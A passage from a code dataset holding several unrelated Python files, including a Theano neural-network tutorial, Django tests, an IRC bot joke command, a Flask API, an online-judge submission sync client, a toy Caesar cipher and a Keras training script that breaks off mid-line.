classes we have.\n The number of nodes in the hidden layer will vary.\nCreated on Mon Dec 4 12:51:47 2017\n@author: Raul Vazquez\n\"\"\"\n#----------------------------------------------------------------\n# THIS PART IS THE SAME AS nn1.py:\n#----------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nimport scipy.optimize as op\n##########################\n##########################\nimport os\nos.chdir(\"C:\\\\Users\\\\Raul Vazquez\\\\Desktop\\\\reSkilling\\\\reSkilling\\\\nn_implementation\")\n############################\n############################\nimport utils_loc\n\n# Generate a dataset and plot it\nnp.random.seed(100)\nX_train, y_train = datasets.make_moons(200, noise=0.25)\nX_train = X_train.astype('float32')\nplt.scatter(X_train[:,0], X_train[:,1], s=40, c=y_train, cmap=plt.cm.Spectral)\n\n\nm = len(X_train) # training set size\nnn_input_dim = X_train.shape[1] # input layer dimensionality\nnn_output_dim = 2 # output layer dimensionality\n''' IMPORTANT PARAMETER: play with nn_hdim to see how the decision boundary changes'''\nnn_hdim = 4 # hidden layer dmensionality (3 seems to be the optimal, 4 already overfitts the data)\n# Gradient descent parameters\nepsilon = 0.01 # learning rate for gradient descent\nreg_lambda = 0.01 # regularization strength\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\nimport theano\nimport theano.tensor as T\ntheano.config.floatX = 'float32'\n# Data vectors as tensors\nX = T.matrix('X', dtype='float32') # matrix of doubles\ny = T.ivector('y') # vector of int32\n''' We have not assigned any values to X or y.\n All we have done is defined mathematical 
expressions for them.\n If we want to evaluate an expression we can call its eval method.\n EXAMPLE 1:\n (X * 2).eval({X : [[1,1],[2,2]] })\n evaluates the expression X * 2 for the values in the array X: [[1,1],[2,2]]\n EXAMPLE 2:\n Create a Theano function\n Mat = T.matrix('Mat')\n x_squared = Mat ** 2\n X_call_xsquared = theano.function([Mat], x_squared)\n When called, evaluates the expression defined my x_squared for the values\n in the input given\n X_call_xsquared([[1,1],[2,2]])\n'''\n\n# Assign parameters W_1, b_1, W_2, b_2 as shared variables.\n# initialize bias uhnits to zero and the weights randomly to break the symmetry of the problem\nW1 = theano.shared(np.random.randn(nn_input_dim, nn_hdim), name='W1')\nb1 = theano.shared(np.zeros(nn_hdim), name='b1')\nW2 = theano.shared(np.random.randn(nn_hdim, nn_output_dim), name='W2')\nb2 = theano.shared(np.zeros(nn_output_dim), name='b2')\nW1.get_value() # shows the values of W1\n\n''' FORWARD propagation. Same code as in utils_loc.py \nBUT now we are difining expressions, not evaluating. ''' \na1 = X\nz2 = a1.dot(W1) + b1\na2 = T.tanh(z2)\nz3 = a2.dot(W2) + b2\na3 = T.nnet.softmax(z3) # recall a3 is the probs of each example to belong to each class\nexp_scores = T.exp(z3)\na3bis = exp_scores / T.sum(exp_scores, axis=1, keepdims=True)\n\n# The regularization term \nloss_reg = 1./m * reg_lambda/2 * (T.sum(T.sqr(W1)) + T.sum(T.sqr(W2))) \n# the loss function we want to optimize\ndata_loss = T.nnet.categorical_crossentropy(a3, y).mean() + loss_reg\n\n# Returns the predicted class for that example/input \nprediction = T.argmax(a3, axis=1)\n\n# Theano functions that can be called from our Python code\nfwd_prop = theano.function([X], a3)\nfwd_propBIS = theano.function([X], a3bis)\ncalculate_loss = theano.function([X, y], data_loss)\npredict = theano.function([X], prediction)\n\n# Example call: Forward Propagation\n# fwd_prop([[4,6]]), fwd_prop([[4,6],[2,3]]) # the argmuent must be of dims m*2 (just 2 cols, since X is like that)\n\n# Calculate the derivatives with Theano\ndW2 = T.grad(data_loss, W2)\ndb2 = T.grad(data_loss, b2)\ndW1 = T.grad(data_loss, W1)\ndb1 = T.grad(data_loss, b1)\n''' \nWe could here use BACK propagation with the expression definition (as we did for FWDprop):\n y_canonical = T.eye(2)[y]\n delta3 = a3 - y_canonical # recall delta3 = a3 - y, when y defd as a matrix with boolean canonical entries\n delta2 = delta3.dot(W2.T) * (1 - T.power(a2, 2))\n # derivatives\n dW2_noreg = (a2.T).dot(delta3)\n db2 = T.sum(delta3, axis=0, keepdims=True)\n dW1_noreg = np.dot(a1.T, delta2)\n db1 = T.sum(delta2, axis=0)\n # include regularization term\n dW2 = dW2_noreg + reg_lambda * W2\n dW1 = dW1_noreg + reg_lambda * W1\n'''\n\n# define a SIMPLE GRADIENT DESCENT in THEANO\ngradient_step = theano.function( [X, y],\n updates=((W2, W2 - epsilon * dW2),\n (W1, W1 - epsilon * dW1),\n (b2, b2 - epsilon * db2),\n (b1, b1 - epsilon * db1)))\n\n# Initialize the parameters to random values. 
We need to learn these.\n# (Needed in case we call this function multiple times)\nnp.random.seed(0)\nW1.set_value(np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim))\nb1.set_value(np.zeros(nn_hdim))\nW2.set_value(np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim))\nb2.set_value(np.zeros(nn_output_dim))\n\ndef train_model(num_iters=20000, print_loss=False):\n '''\n This function learns parameters for the neural network and returns the model.\n INPUT: \n - num_passes: Number of passes through the training data for gradient descent\n - print_loss: If True, print the loss every 1000 iterations\n '''\n # Gradient descent. For each batch...\n for i in range(0, num_iters):\n # This will update our parameters W2, b2, W1 and b1!\n gradient_step(X_train, y_train)\n \n # Optionally print the loss.\n # This is expensive because it uses the whole dataset, so we don't want to do it too often.\n if print_loss and i % 1000 == 0:\n print (\"Loss after iteration %i: %f\" %(i, calculate_loss(X_train, y_train)) )\n\n\n# Build a model with a 3-dimensional hidden layer\ntrain_model(10000, print_loss=True)\n\n# Plot the decision boundary\nutils_loc.plot_decision_boundary(lambda x: \n utils_loc.predict(W1.get_value(), b1.get_value(), W2.get_value(), b2.get_value(), x),X_train,y_train)\nplt.title(\"Decision Boundary for hidden layer size \"+ str( nn_hdim))\n\n\n\n\n##############################################################################\n######################### USE SCIPY TO TRAIN THE MODEL #######################\n##############################################################################\n'''\nAs in nn1.py one can use the minimization routines implemented in scipy.optimize\nI decided to do it as follows\n'''\ntheano.config.floatX = 'float32'\n\n# make random initialization of the params \nW1.set_value(np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim))\ncardW1 = nn_input_dim*nn_hdim\nb1.set_value(np.zeros(nn_hdim))\nW2.set_value(np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim))\nb2.set_value(np.ones(nn_output_dim))\ninitial_grad = np.append(np.append(b1.get_value(), (W1.get_value()).ravel()), np.append(b2.get_value(), (W2.get_value()).ravel() ) )\n\n# define a theano function to evaluate the gradient at the given values. 
\neval_gradient = theano.function([X,y], (db1, dW1, db2, dW2),\n updates = ((W2, W2 - epsilon * dW2),\n (W1, W1 - epsilon * dW1),\n (b2, b2 - epsilon * db2),\n (b1, b1 - epsilon * db1)))\n\ndef caller(x):\n loss = calculate_loss(X_train,y_train)\n grads = eval_gradient(X_train, y_train)\n grad= np.append(np.append(grads[0], grads[1].ravel()), np.append(grads[2], grads[3].ravel() ) ) \n return (np.float(loss), grad)\n\n\nresult = op.minimize(fun = caller, x0 = initial_grad, jac = True)\n\nnew_b1 = result.x[0:nn_hdim]\nnew_W1 = np.reshape( result.x[nn_hdim:(nn_hdim + cardW1)], (nn_input_dim, nn_hdim) )\nnew_b2 = result.x[(nn_hdim + cardW1):(nn_hdim + cardW1 + nn_output_dim)]\nnew_W2 = np.reshape( result.x[(nn_hdim + cardW1 + nn_output_dim):], (nn_hdim, nn_output_dim) )\n \n\nutils_loc.plot_decision_boundary( (lambda x: utils_loc.predict(W1.get_value(), b1.get_value(), W2.get_value(), b2.get_value(), x)), X_train, y_train )\nplt.title(\"Decision Boundary of initial Parameters\")\n \nutils_loc.plot_decision_boundary( (lambda x: utils_loc.predict(new_W1, new_b1, new_W2, new_b2, x) ), X_train,y_train)\nplt.title(\"Decision Boundary for hidden layer size \"+ str( nn_hdim))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"nn_implementation/nn1_theano.py","file_name":"nn1_theano.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448509820","text":"import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom django.urls import reverse\n\nfrom .models import Question\n\n\ndef create_question(question_text, days):\n \"\"\" Create a questions with days offset (+ve for future, -ve for past) \"\"\"\n time = timezone.now() + datetime.timedelta(days=days)\n return Question.objects.create(question_text=question_text, pub_date=time)\n\n\nclass QuestionModelTest(TestCase):\n def test_was_published_recently_with_future_qs(self):\n \"\"\" was_published_recently() returns False for future dates \"\"\"\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n def test_was_published_recently_with_old_qs(self):\n \"\"\" was_published_recently() returns False for qs older than 1 day \"\"\"\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n\n def test_was_published_recently_with_recent_qs(self):\n \"\"\" was_published_recently() returns True for qs created within a day \"\"\"\n time = timezone.now() - timezone.timedelta(hours=23, minutes=59, seconds=1)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n\nclass QuestionIndexViewTest(TestCase):\n def test_no_questions(self):\n response = self.client.get(reverse('polls:index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"No polls are available\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_past_question(self):\n create_question(\"Past\", days=-20)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(response.context['latest_question_list'],\n [''])\n\n def test_future_question(self):\n create_question(question_text=\"Future\", days=20)\n response = self.client.get(reverse('polls:index'))\n self.assertContains(response, \"No polls are 
available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479670006","text":"from PySide.QtGui import *\nfrom PySide.QtCore import *\n\ndef main():\n import sys\n\n app = QApplication(sys.argv)\n\n window = QMainWindow()\n\n # メニューの追加\n # メニューバーを取得する\n menubar = window.menuBar()\n\n # File メニューを追加する\n filemenu = menubar.addMenu(\"&File\")\n\n # File メニューに、Exit メニュー項目を追加する\n\n exit_action = filemenu.addAction(\"&Exit\")\n exit_action.triggered.connect(app.quit)\n\n window.show()\n\n # メイン イベントループを開始する\n app.exec_()\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"source/sample/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447967092","text":"# agency.py\n\nimport random\n\n# Metadata\n\nNAME = 'agency'\nENABLE = True\nTYPE = 'command'\nPATTERN = '^!(?Pcia|fbi|fiveeyes|kgb|eu|gnu|gnome)$'\nUSAGE = '''Usage: !agency\n Will report activity to desired agency\n'''\n\n# reasons\nreasons = {\n \"cia\":[\n \"This incident has been reported (Case #\",\n \"This regime will be overthrown (Useless War #\"\n ],\n \"fbi\":[\n \"This collusion with Russia has been filed and will be used against you at a politcally opportune moment (Case #\"\n ],\n \"fiveeyes\":[\n \"This communication has been intercepted and will be shared among members of the Five Eyes (Case #\"\n ],\n \"kgb\":[\n \"The Party has been notified of your bourgeois thought. (Gulag Inmate #\"\n ],\n \"eu\":[\n \"Your attempt at executing a mutually beneficial trade has been been brought before the European Commission. (Anti-Trust Case #\",\n \"Your speech has been regulated. (EU Law #\"\n ],\n \"gnu\":[\n \"Your use of proprietary software has been reported to the FSF. (Assigned GNULAG #\"\n ],\n \"gnome\":[\n \"Your disgust over KDE has been noted. (Cult Follower #\",\n \"You are now subscribed to GNOME Facts! 
(Cult Follower #\"\n ]\n }\n\n# Command\n\ndef command(bot, nick, message, channel, agency=None):\n report = ''.join([\"%s\" % random.randint(0, 9) for num in range(0, 5)])\n response = random.choice(reasons[agency]) + report + \")\"\n\n bot.send_response(response, nick, channel)\n\n# Register\n\ndef register(bot):\n return (\n (PATTERN, command),\n )\n\n# vim: set sts=4 sw=4 ts=8 expandtab ft=python:\n","sub_path":"modules/agency.py","file_name":"agency.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"482928522","text":"from heapq import heappush,heappop\nimport sys\n\nINF = int(1e9)\ngraph =[[]]\na =[]\ndef update_road(n,s_node,e_node,roads,trap,n_node): \n global graph\n global a\n update_n_node = n_node\n print(\"udate_n_node:\",n_node)\n if trap==True:\n print(\"***********\")\n for road in roads:\n #print(\"roads:\",roads)\n print(\"road[0]:\",road[0])\n print(\"road[1]:\",road[1])\n\n if road[0] == update_n_node or road[1] == update_n_node:\n print(\"update_n_node:\", update_n_node)\n a.append(road[0])\n a.append(road[1])\n road[0] = a[1]\n road[1] = a[0]\n a=[]\n print(\"road:\",road)\n graph = [[]for i in range(n+1)]\n \n for road in roads:\n s_node, e_node, cost = road[0], road[1], road[2]\n graph[s_node].append([e_node,cost])\n\n print(graph)\ndef preprocess(n, roads):\n global graph\n #각 노드에 연결되어있는 노드에 대한 정보를 담는 리스트\n graph = [[]for i in range(n+1)]\n \n for road in roads:\n s_node, e_node, cost = road[0], road[1], road[2]\n graph[s_node].append([e_node,cost])\n\n print(graph)\n\ndef dijkstra(n,s_node,e_node,roads,traps):\n global graph\n table = [INF for i in range(n+1)]\n table[s_node] = 0\n print(table)\n pq = [[0,s_node]]\n\n while pq:\n dist, now = heappop(pq)\n\n \n for item in graph[now]:\n trap = False\n print(\"graph[now] :\",graph[now])\n n_node, cost = item[0], item[1]\n print(\"n_node:\", n_node)\n cost +=dist\n print(\"cost:\", cost)\n \n if n_node in traps:\n trap = True\n update_road(n,s_node,e_node,roads,trap,n_node)\n if cost< int(1e9):\n if n_node != s_node: \n table[n_node] = cost\n heappush(pq,[cost,n_node])\n print(\"pq: \",pq)\n print(table)\n return table[e_node]\nn,start,end = 4,1,4\nroads = [[1, 2, 1], [3, 2, 1],[2,4,1]]\ntraps = [2,3]\nprint(preprocess(n,roads))\nprint(dijkstra(n,start,end,roads,traps))\n\n","sub_path":"kako4.py","file_name":"kako4.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536145175","text":"from flask import Flask, g\nimport pymysql\n\nfrom api_blueprint import api_bp\n\napp = Flask('CBS_API')\n\napp.config.from_object('config')\n\napp.register_blueprint(api_bp)\n\n\n@app.before_request\ndef before_request():\n g.db = pymysql.connect(**app.config['DATABASE'],\n cursorclass=pymysql.cursors.DictCursor)\n\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n\nif __name__ == '__main__':\n app.run(**app.config['FLASK'])\n","sub_path":"cbsapi/cbsapi.py","file_name":"cbsapi.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"580155816","text":"import sys\n\ntext_list = []\nresult = ''\n\nfor _ in range(5):\n text_list.append(sys.stdin.readline().strip())\n\n# 리스트 중 가장 긴 길이\nfor i in range(max(len(t) for t in text_list)):\n for text in text_list:\n result += text[i] if len(text) > i else 
''\n\nsys.stdout.writelines(result)\n","sub_path":"backjoon/기타/10798_세로읽기.py","file_name":"10798_세로읽기.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492241966","text":"import requests\nfrom requests.auth import HTTPBasicAuth\n\nfrom sqlalchemy.orm import sessionmaker\nfrom data_updater.models import server as server_models\n\nfrom datetime import datetime\nfrom time import mktime\n\nfrom .cache import update_cache\nfrom config import CLIENT_SETTINGS\n\nfrom .utils import request_data, updated_request, timestamp_cur, str_to_datetime\n\nurl = CLIENT_SETTINGS['root_url'].rstrip('/') + '/' + CLIENT_SETTINGS['submission_url'].lstrip('/')\nusername = CLIENT_SETTINGS['username']\npassword = CLIENT_SETTINGS['password']\nauth = HTTPBasicAuth(username, password)\ncache_name = 'submission_updater_cache'\n\n\nSession = sessionmaker(bind=server_models.engine)\nsession = Session()\n\n\n# 废弃代码\ndef request_submit(submission_json):\n request_url = '%s/' % (url.rstrip('/'),)\n r = requests.post(url, submission_json, auth=auth)\n if r.status_code == 201:\n return r.json()\n else:\n return None\n\n\n# 废弃代码\ndef submit(submission_json):\n \"\"\"\n 发起一次提交,将submission提交到Server端。该函数会返回Server端的请求回执信息。\n :param submission_json: \n :return: \n \"\"\"\n chance_left = 3\n result = None\n while result is None and chance_left > 0:\n print('submitting submission, tried %s ......' % (3 - chance_left,))\n result = request_submit(submission_json)\n chance_left -= 1\n if result is None:\n print('submitting submissio failed')\n return result\n\n\ndef request_submission_list(request_url):\n return request_data(url=request_url, auth=auth)\n\n\ndef request_submission_detail(sid):\n request_url = '%s/%s/' % (url.rstrip('/'), str(sid))\n return request_data(url=request_url, auth=auth)\n\n\ndef write_submission_compile_info(local_id, submission_json):\n info = session.query(server_models.CompileInfo).filter_by(submission_id=local_id).first()\n if info is not None:\n info.info = submission_json['compile_info']\n\n\ndef write_submission_test_data_status(local_id, submission_json):\n test_data = session.query(server_models.TestDataStatus).filter_by(submission_id=local_id).first()\n if test_data is not None:\n test_data.status = submission_json['test_data_status']\n\n\ndef write_submission_code(local_id, submission_json):\n code = session.query(server_models.SubmissionCode).filter_by(submission_id=local_id).first()\n if code is not None:\n code.code = submission_json['code']\n\n\ndef write_rank(local_submission, submission_json):\n \"\"\"\n 根据提交,将提交的信息更新到Rank上去。\n :param local_submission: \n :param submission_json: \n :return: \n \"\"\"\n if local_submission.finished is False: # 仅当提交已完成,才会做累计。\n return\n rank = session.query(server_models.Rank).filter_by(mission_id=local_submission.mission_id).first()\n mission = session.query(server_models.Mission).filter_by(id=local_submission.mission_id).first()\n\n if rank is None:\n # 创建新的model\n rank = server_models.Rank(\n mission_id=local_submission.mission_id,\n user_id=local_submission.user_id,\n organization_id=local_submission.organization_id,\n sub_count=0,\n solved=0,\n penalty=0,\n sum_score=0,\n result={}\n )\n session.add(rank)\n problem_id = local_submission.problem_id # 获得了题目的ID。\n rank.sub_count += 1\n if str(problem_id) not in rank.result: # 这个题目还没有被提交过的痕迹,那么就创建。\n rank.result[str(problem_id)] = {\n 'sub_count': 0,\n 'ac_time': None,\n 'wrong_count': 0,\n 'status': '',\n 
'average_score': 0,\n 'max_score': 0,\n 'latest_score': 0\n }\n # 下面对该题目的信息进行更新\n p_result = rank.result[str(problem_id)]\n\n if p_result['ac_time'] is None: # 这表明该题目仍未AC\n if local_submission.status == 'AC': # 这次AC了\n now_time = datetime.now()\n p_result['ac_time'] = now_time\n p_result['status'] = 'AC'\n rank.solved += 1\n # 这里的罚时计算规则是每一次错误20分钟。\n this_penalty = mktime(now_time - mission.start_time) + p_result['wrong_count'] * 20 * 60\n rank.penalty += this_penalty\n else: # 这次还是没有AC……\n p_result['wrong_count'] += 1\n p_result['status'] = local_submission.status\n # 而如果该题目AC了,那么后续的提交是不会有影响的。\n now_score = local_submission.score\n old_latest_score = p_result['latest_score']\n old_max_score = p_result['max_score']\n old_average_score = p_result['average_score']\n p_result['latest_score'] = now_score\n if now_score > p_result['max_score']:\n p_result['max_score'] = now_score\n p_result['average_score'] = \\\n (p_result['average_score'] * p_result['sub_count'] + now_score) / (p_result['sub_count'] + 1)\n # 更新提交次数必须放在后面,因为前面有个平均数依赖\n p_result['sub_count'] += 1\n # 更新在总集中的sum_score\n if mission.config['type'] == 'oi':\n if mission.config['type_config']['valid_submission'] == 'latest':\n rank.sum_score += p_result['latest_score'] - old_latest_score\n elif mission.config['type_config']['valid_submission'] == 'highest':\n rank.sum_score += p_result['max_score'] - old_max_score\n rank.result = p_result\n\n\ndef write_submission(submission_json):\n submission = session.query(server_models.Submission).filter_by(sid=submission_json['id']).first()\n if submission is not None:\n print(\"Update submission %s\" % (submission_json['id'],))\n submission.time = submission_json['time']\n submission.memory = submission_json['memory']\n submission.length = submission_json['length']\n submission.status = submission_json['status']\n submission.score = submission_json['score'] if 'score' in submission_json else None\n submission.finished = submission_json['finished']\n submission.update_time = submission_json['update_time']\n # 由于查询附带信息需要本地提交的id,所以需要手动加入。\n write_submission_compile_info(submission.id, submission_json)\n write_submission_test_data_status(submission.id, submission_json)\n write_submission_code(submission.id, submission_json)\n session.commit()\n\n\ndef update_submission(sid):\n chance_left = 3\n submission_detail = None\n while submission_detail is None and chance_left > 0:\n submission_detail = request_submission_detail(sid)\n chance_left -= 1\n if submission_detail is not None:\n write_submission(submission_detail)\n\n\ndef update_submissions(update_all=False):\n time = timestamp_cur()\n request_url = url if update_all else updated_request(url, cache_name)\n while request_url is not None:\n chance_left = 3\n submission_list = None\n while submission_list is None and chance_left > 0:\n # 我觉得在请求列表的时候可以把user也作为过滤筛选项。\n submission_list = request_submission_list(request_url)\n chance_left -= 1\n if submission_list is None:\n request_url = None\n else:\n for s in submission_list['results']:\n update_submission(s['id'])\n request_url = submission_list['next']\n update_cache(cache_name, time)\n\n","sub_path":"Client/sdustoj_client/data_updater/functions/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652616319","text":"# -*- coding:utf-8 -*-\n#凯撒密码:把字母移动一定的位数\n\n\n#字符表\nmstr = 'abcdefghijklmnopqrstuvwxyz'\n#字符表长度\nlenthM = len(mstr)\n\ndef caesar(strs, shift):\n 
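# Caesar cipher: shifts each character of strs by shift positions within mstr,
# wrapping with modulo lenthM; calling it again with -shift decrypts.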
'''\n\n :param strs: 输入明文\n :param shift: 移动的位数\n :return:加密后的结果\n '''\n newstrs = ''\n for x in strs:\n #获取x字符在mstr中的位置\n numX = mstr.index(x)\n\n #更新新的位置\n numX = (numX + shift) % lenthM\n\n newstrs = newstrs + mstr[numX]\n\n return newstrs\n\nif __name__ == '__main__':\n strs = raw_input(\"Enter character sequence:\")\n shift = input(\"shift Number:\")\n C = caesar(strs, shift)\n print(\"CiperText:\", C)\n print(\"PlainText:\", caesar(C, int(shift)*(-1)))","sub_path":"classical/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478646844","text":"\"\"\"\npython train_model_attribute.py --gpus 1 --name inceptionv3 --image_size 139 --batch_size 64 --weights ../models/inceptionv3/inceptionv3_2018-08-28_baseline_model.h5\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport math\nimport random\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import Model, Sequential\nfrom keras.applications import VGG16, VGG19\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.densenet import DenseNet121\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.mobilenet import MobileNet\nfrom keras.layers import Flatten, Dense, GlobalAveragePooling2D\nfrom keras.preprocessing import image\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau, EarlyStopping, TensorBoard, CSVLogger\nfrom keras.utils import multi_gpu_model\nimport os\nimport datetime\nimport argparse\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\n\n\ndef array2dic(array, classes):\n index = 0\n dic = {}\n for m,n in classes.items():\n old_index = index\n index += n\n dic.update({m : array[:, old_index:index]})\n return dic\n\ndef generate_batch_data(X, y, batch_size, classes):\n length = len(y)\n index = [i for i in range(0, length // batch_size + 1)]\n random.shuffle(index)\n for i in range(len(index)):\n start_idx = index[i] * batch_size\n end_idx = index[i+1] * batch_size\n if end_idx >= length:\n end_idx = length\n yield X[start_idx:end_idx], array2dic(y[start_idx:end_idx], classes)\n\n\ndef parse_arg():\n parser = argparse.ArgumentParser(description='training of the baseline...')\n parser.add_argument('--gpus', type=str, default='',\n help='gpu device\\'s ID need to be used')\n parser.add_argument('--name', type=str, default='',\n help='the model has been learned, including : ' + str(model_names))\n parser.add_argument('--image_size', type=int, default=64,\n help='the image size need to input the network')\n parser.add_argument('--batch_size', type=int, default=64,\n help='the batch size need to train the model')\n parser.add_argument('--weights', type=str, default='',\n help='the weights file need to train the model')\n args = parser.parse_args()\n if args.name not in model_names:\n print(\"Try again!Input the right model name as following: \")\n print(model_names)\n exit()\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus\n return args\n\n\nmodel_names = ['inceptionv3', 'vgg19', 'mobilenet', 'densenet121', 'resnet50']\nargs = parse_arg()\ngpus_num = len(args.gpus.split(','))\n\nconfig = tf.ConfigProto() \nconfig.gpu_options.allow_growth=True #不全部占满显存, 按需分配\nsess = tf.Session(config=config)\n\nKTF.set_session(sess)\n\nmodel_dir = \"\"\nmodel_name = \"\"\nif args.name == \"inceptionv3\":\n model_dir = \"../models/inceptionv3/\"\n 
model_name = \"Inceptionv3a25DataB\"\nelif args.name == \"vgg19\":\n model_dir = \"../models/vgg19/\"\n model_name = \"vgg19pre_\"\nelif args.name == \"densenet121\":\n model_dir = \"../models/densenet121/\"\n model_name = \"DenseNet121\"\nelif args.name == \"mobilenet\":\n model_dir = \"../models/mobilenet/\"\n model_name = \"mobile\"\nelif args.name == \"resnet50\":\n model_dir = \"../models/resnet50/\"\n model_name = \"resnet50\"\nimage_size = args.image_size\nbatch_size = args.batch_size\nnb_epoch = 500\n\ndef schedule_decay(epoch):\n initial_lrate = 0.01\n drop = 0.5\n epochs_drop = 10.0\n lrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n return lrate\n\n\n#Define the callbacks: checkpointer, decaylr, reducelr, earlystop, csvlog\n\"\"\"\nmonitor = 'loss'\ncheckpointer = ModelCheckpoint(filepath = model_dir + model_name + '_epoch{epoch:02d}_valloss{'+ monitor + ':.2f}.hdf5',\n monitor = monitor,\n verbose=1, \n save_best_only=True, \n save_weights_only=False,\n mode='auto', \n period=1)\n \"\"\"\nmonitor = 'val_loss'\ncheckpointer = ModelCheckpoint(filepath = model_dir + model_name + '_epoch{epoch:02d}_valloss{'+ monitor + ':.2f}.hdf5',\n monitor = monitor,\n verbose=1, \n save_best_only=True, \n save_weights_only=False,\n mode='auto', \n period=25)\ndecaylr = LearningRateScheduler(schedule_decay)\nreducelr = ReduceLROnPlateau(monitor = monitor,\n factor=0.1, \n patience=4, \n verbose=0, \n mode='auto', \n epsilon=0.0001, \n cooldown=0,\n min_lr=0)\nearlystop = EarlyStopping(monitor= monitor, patience=20, verbose=1, mode='auto')\ntensorboard = TensorBoard(log_dir=model_dir + 'logs', \n histogram_freq=0, \n write_graph=True, \n write_images=False, \n embeddings_freq=0,\n embeddings_layer_names=None, \n embeddings_metadata=None)\ncsvlog = CSVLogger(model_dir + 'logs/log_attributes.csv')\n\n\n#Define the model used to trainning without top layer -> feature extracting mainly used future\n#'imagenet' -> None\nclasses = { 'animal' : 1,\n 'transportation' : 1,\n 'clothes' : 1,\n 'plant' : 1,\n 'tableware' : 1,\n 'device' : 1,\n 'other_classes' : 1,\n 'black' : 1,\n 'white' : 1,\n 'blue' : 1,\n 'brown' : 1,\n 'orange' : 1,\n 'red' : 1,\n 'green' : 1,\n 'yellow' : 1,\n 'has_feathers' : 1,\n 'has_four_legs' : 1,\n 'has_two_legs' : 1,\n 'has_two_arms' : 1,\n 'for_entertainment' : 1,\n 'for_business' : 1,\n 'for_communication' : 1,\n 'for_family' : 1,\n 'for_office_use' : 1,\n 'for_personal' : 1\n} \n\"\"\"\n 'cla' : 6+1,\n # 'clo' : 8, #暂且不用\n 'has' : 4,\n 'for' : 6\n # 'is' : 6 #暂且不用\n 'gorgeous' : 1,\n 'simple' : 1,\n 'elegant' : 1,\n 'cute' : 1,\n 'pure' : 1,\n 'naive' : 1\n\"\"\"\nif args.name == \"inceptionv3\":\n #base_model = InceptionV3(weights=None, include_top=False, pooling = 'avg')\n base_model = InceptionV3(weights=None, include_top=False, input_shape=(image_size, image_size, 3))\nelif args.name == \"vgg19\":\n #base_model = VGG19(weights=None, include_top=False, pooling = 'avg')\n base_model = VGG19(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"densenet121\":\n base_model = DenseNet121(weights=None, include_top=False, pooling = 'avg')\n #base_model = DenseNet121(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"mobilenet\":\n base_model = MobileNet(weights=None, include_top=False, pooling = 'avg')\n #base_model = MobileNet(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\nelif args.name == \"resnet50\":\n base_model = ResNet50(weights=None, 
